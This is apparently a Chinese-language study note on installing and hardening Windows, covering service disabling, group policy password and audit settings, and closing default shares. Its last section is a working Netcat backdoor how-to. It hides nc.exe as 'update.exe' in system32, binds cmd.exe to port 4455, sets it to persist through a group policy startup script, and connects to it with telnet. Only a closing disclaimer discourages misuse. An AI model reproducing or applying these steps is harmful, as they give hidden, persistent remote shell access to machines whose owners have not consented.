一、安装步骤
1、拔出网线
2、安装Windows及驱动程序
3、安装杀毒软件及防火墙
4、连接网线,升级病毒库及Windows补丁
5、安装常用工具及软件
6、优化
二、Windows优化
1、禁用不必要的服务
Application Management 组策略部署软件
Certificate Propagation 为智能卡提供证书
DFS Replication 分布式文件系统
[DHCP Client 自动获取IP]
Diagnostic Policy Service 诊断服务(系列)
Distributed Link Tracking Client NTFS文件系统连接
Fax 传真服务
Human Interface Device Access 智能手柄或笔记本快捷键
Microsoft iSCSI Initiator Service iSCSI设备服务
Net.Msmq 侦听器适配器
Net.Pipe 侦听器适配器
Offline Files 脱机文件服务
[Parental Controls 家长服务]
PnP-X IP Bus Enumerator 即插即用扩展(网络冰箱等)
2、采用一些第三方软件
推荐使用金山卫士,Windows优化大师等
360性能卓越,但是非常卡
3、组策略配置【能够实现的功能非常多是Windows,系统中最重要的安全管理工具,需要仔细研究】
密码策略
(1)gpedit.msc启动本地组策略
计算机配置-windows设置-安全策略-账户策略
(2) 密码策略
(3) 账户锁定策略
【附】密码原则:
复杂性 【最小8位】
易记忆性 【密码最好是一句对自己有意义的话】
时效性 【一般不要超过三个月,最长不要超过半年!】
如:
飞流直下三千尺 Flzxsqc: fl2x3_QC
【万一需要把密码保存下来要用gpg加密工具 【Linux 下 pgp】】
审核策略
(1)计算机配置-windows设置-安全策略-本地策略
审核策略【比较重要的选项】
审核账户登录 (本地账户登录)一旦登录系统,就会记录到时间查看器中
审核登录 (域账户登录)
审核策略更改
审核系统事件 (系统关机、重启或发生安全事件)
4、关闭默认共享
如果是默认共享的话,在局域网中,只要在另一台电脑上,开始菜单,键入
\\IP地址\盘符【如:c:】就可以直接访问到本地电脑上的文件内容
5、禁用guest账户
6、修改管理员用户名
三、Netcat后门工具
Netcat是windows中最常见的后门工具【首先需要拿到这台计算机的控制权限】
1、下载后把nc.exe拷贝的任意位置,找个不容易发现,普通用户不敢动的位置藏起来。如:c:\windows\system32中,并改个不容易发现的名字如update.exe
2、在被攻击端执行
3、C:\windwos\system32\update.exe –p 4455 –L –d -e cmd.exe
-p 指定nc映射到4455端口 【netstat -a查看系统中所有已经开启的端口】
-L 开启后持续允许访问
-d 允许命令行关闭
-e 映射到cmd程序
4、在被攻击端保证update.exe开机自启动,最好使用组策略
(1)将该命令写入一个脚本
(2)gpedit.msc启动本地组策略
计算机配置-windows设置-脚本启动-启动
导入脚本
5、攻击人员只要使用命令
telnet 被攻击端ip地址 4455
连接4455端口时,就可以获得被攻击服务器的权限
【Win7中telnet命令需要手工开启】
【Netcat工具包保存在我的资源文件中,感兴趣的读者敬请下载】
附:这篇笔记介绍的网络后门工具纯出于兴趣,希望读者千万不要拿别人的计算机进行尝试,否则是要承担一定法律后果的额,一定要遵守相关法律,希望大家理解,谢谢!